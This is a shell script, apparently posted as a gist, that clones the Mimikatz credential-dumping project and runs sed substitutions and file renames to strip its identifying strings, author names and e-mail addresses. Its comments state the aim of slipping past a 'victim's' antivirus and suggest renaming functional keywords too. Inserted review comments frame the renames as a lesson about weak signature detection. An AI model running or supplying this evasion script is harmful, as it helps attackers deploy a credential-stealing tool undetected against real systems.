Mimikatz Obfuscator
# This script downloads and slightly "obfuscates" the mimikatz project. | |
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ..., | |
# so removing them from the project before compiling gets us past most of the AV solutions. | |
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ...., | |
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program. | |
# NOTE(review): the trailing "| |" on every line is table residue from the gist rendering, not part of the script.
# NOTE(review): every step below is a literal-string substitution or file rename (project name, author
# names, e-mail addresses, domains, licence wording); the intent is a rename, not a change in what the
# code does. Defensive takeaway: signatures keyed only on such strings are brittle and are bypassed by
# exactly this kind of search-and-replace; detection should also rest on the tool's runtime behaviour.
# Clone the upstream project into ./windows and rename its top-level "mimikatz" directory.
git clone https://github.com/gentilkiwi/mimikatz.git windows | |
mv windows/mimikatz windows/candycrush | |
# Global in-place substitutions over every regular file under windows/ (source, docs and project files alike).
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/candycrush/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/Mimikatz/Candycrush/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/DELPY/Thorsten/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/Benjamin/Mueller/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/benjamin@gentilkiwi.com/thorsten.mueller@gmail.com/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/creativecommons/powerpoint/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/gentilkiwi/o365/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/KIWI/AWS/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/Kiwi/Aws/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/kiwi/aws/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/A La Vie, A L/Good choice/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/vincent.letoux@gmail.com/latourde.delux@gmail.com/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/benjamin/theodor/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/Benjamin DELPY/theodor preuss/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/oe.eo/whoot/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/pingcastle.com/google.com/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/mysmartlogon.com/facebook.com/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/Vincent LE TOUX/another name/g' | |
# Rename regular files whose *name* contains "mimikatz"; directories are not visited here (-type f),
# only the one moved above.
find windows/ -type f -name '*mimikatz*' | while read FILE ; do | |
newfile="$(echo ${FILE} |sed -e 's/mimikatz/candycrush/g')"; | |
mv "${FILE}" "${newfile}"; | |
done | |
# Same treatment for regular files whose name contains "kiwi".
find windows/ -type f -name '*kiwi*' | while read FILE ; do | |
newfile="$(echo ${FILE} |sed -e 's/kiwi/aws/g')"; | |
mv "${FILE}" "${newfile}"; | |
done |